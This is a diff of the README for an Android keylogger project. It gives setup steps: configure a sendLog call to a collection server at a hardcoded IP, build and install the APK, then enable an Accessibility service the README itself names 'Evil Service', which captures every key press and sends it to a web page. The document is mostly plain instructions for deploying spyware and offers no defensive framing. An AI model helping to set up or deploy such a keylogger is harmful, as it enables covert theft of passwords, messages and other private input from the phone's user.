maemresen/android-keylogger/README.md

         sendLog("http://192.168.1.37:8080/keylog/save", keyLog);
         ```
     1. Replace `192.168.1.37` with the IP of the machine that you deploy `keylogweb`
+3. Build APK and Install it on your Android Device
-3. You should enable `Evil Service` which listens key press and send them to the server
+4. You should enable `Evil Service` which listens key press and send them to the server
    * after installed the App, you have to open Accessibility settings.
 (A button named `Evil Service` is added as a shortcut to directly jump accesibility settings.)
 Then at the bottom of the page, you will see `Evil Service` under Downloaded Services.
 You should enable Evil Service from there.
 Then it will works.
-4. You can check your browser and you will see that each key-press on your Android phone will be printed to the web-page. \
+5. You can check your browser and you will see that each key-press on your Android phone will be printed to the web-page. \
    **!
 Hint:** Do not forget to refresh browser manually.
 Auto-refresh feature not implemented :)